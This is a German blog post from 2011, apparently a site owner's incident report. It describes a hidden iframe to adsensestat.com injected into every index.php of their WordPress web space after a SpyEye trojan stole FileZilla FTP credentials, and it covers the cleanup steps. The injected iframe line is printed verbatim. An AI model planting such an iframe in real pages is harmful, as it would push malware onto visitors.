Unbekannter iFrame in der WordPress Index.php

Attak-300x154 in Unbekannter iFrame in der Wordpress Index.phpHier mein Problem in Kürze.
Beim Aufruf meines Blogs zeigte sich ein “bla bla bla .. Parser-Error in Line 18″. Daraufhin habe ich meine zwei anderen Blogs überprüft. Bei Beiden der gleiche Fehler. Eines der Blogs ist noch nicht Online und per .htaccess mit Passwort geschützt und von diesem “Fehler” trotzdem betroffen. FTP-Programm gestartet und ups… hinter dem abschließenden PHP-Tag fand sich der folgende Code:

<html><body><iframe src=”http://adsensestat.com/” width=”1″ height=”1″ frameborder=”0″></iframe></body></html>

Dieser Code fand sich nicht nur in der index.php des aktuellen Themes sondern in allen Index-Dateien des Webspace. “Leider” Icon Wink in Unbekannter iFrame in der Wordpress Index.php wurde beim Einfügen des Codes, das “>” – Zeichen vom abschließenden PHP-Tag gelöscht. Daher der Parser-Error. Wenn der Code funktioniert hätte, wäre  jedem Besucher meiner Seiten ein Schadprogramm auf den Rechner geladen worden. Inzwischen ist die Seite aus de iFrame schon als “Virenschleuder” gekennzeichnet.

Was war passiert?
Bei einem meiner Ausflüge in die “Bronx” des Internets muss mir eine Seite einen Virus untergejubelt haben. Denn als ich am nächsten Tag meinen Rechner mit Win7 startete, meldete sich nach dem booten mein Antivir mit einer Virenmeldung: “C:\portwexexe\portwexexe.exe’ enthält einen Virus oder unerwünschtes Programm ‘TR/Spyeye.H.34‘ [trojan]
Natürlich war das Verzeichnis unsichtbar und komischerweise war der Tea Timer vom Spybot abgeschaltet.

Was nun?
Es waren nur die Seiten betroffen, deren Zugangsdaten ich im FTP-Programm Filezilla abgespeichert hatte. Ist ja auch kein Wunder, denn die Zugangsdaten samt Passwörtern werden im Klartext in einer XML-Datei abgespeichert. Einfacher kann so ein Virus nicht an FTP-Zugangsdaten kommen. Da braucht der Hacker keine Keylogger. Er klaut einfach diese Datei, liest die Daten in eine Datenbank und schickt seinen Bot auf die Reise deine Index-Dateien zu vermurksen. Und zwar ALLE Index-Dateien des Webspace. Erkennbar sind die geänderten Dateien am gleichen Änderungsdatum. Ich habe meine Dateien gecheckt. und es waren nur die Index-Dateien betroffen.

Als erstes habe ich meinen Rechner mit Linux (Ubuntu) gebootet*, die Passwörter für den Kundenbereich meine Webhosters geändert und die FTP-Zugänge gelöscht. Neue FTP-Zugänge mit neuen Zugangsdaten waren schnell angelegt. Anschließend die Zugangsdaten für die Datenbanken geändert. Per FTP die wp-config.php angepasst und WordPress neu hochgeladen. Theme neu installiert und die zusätzlichen überflüssigen Themes gelöscht. Die Datenbanken waren dank aktueller Backups schnell wieder aufgespielt. Zu den zu ändernden Passwörtern gehören natürlich auch die für  das Online-Banking, die Zugangsdaten für die Mail-Postfächer und dem WordPress Admin-Bereich. Ebay und/oder Skype (bei Guthaben) nicht vergessen. Zur Sicherheit werde ich mein 10 Monate altes Windows-Backup einspielen.

(*Wer keinen Zugang zu einem anderen Rechner oder Betriebssystem hat, sollte über den Einsatz einer Live-CD nachdenken. Gute Kandidaten sind Ubuntu oder Knoppix.)

Fazit!
Online nur noch mit Linux! Jetzt nutze ich Windows endgültig nur noch zum Zocken und für wenige Anwendungen, die unter Linux nicht verfügbar sind.

Nachtrag vom 29.01.2011
Wenn die Systemwiederherstellung unter Windows von dem Virus Spyeye.H.34 nicht deaktiviert wurde ist diese zur Rettung des Systems bestens geeignet. Spyeye ist ein Virenbaukasten wie Zeus. Der “Hacker” kann sich die Funktionen seines Virus nach belieben zusammenklicken. Ich bin mir sicher, dass der Virus mit der Kennung H.34 es nur auf die Serverliste des FTP-Programms Filezilla abgesehen hat. Ich werde unter Windows einen FTP-Zugang zu einem speziellen Verzeichnis anlegen und einmal schauen was passiert.

Nachtrag vom 25.02.2011

Es genügt nicht, die portwexexe.exe zu löschen. Man sollte auch nach der conhost.exe suchen, die nicht im windows/system32 liegt. Diese Datei lädt bei einer Internetverbindung die Datei svr***svr.exe nach. Das ist ein Keylogger fürs Online-Banking. Unter Windows 7 liegt diese Datei unter Benutzer/Benutzername/AppData/Roaming.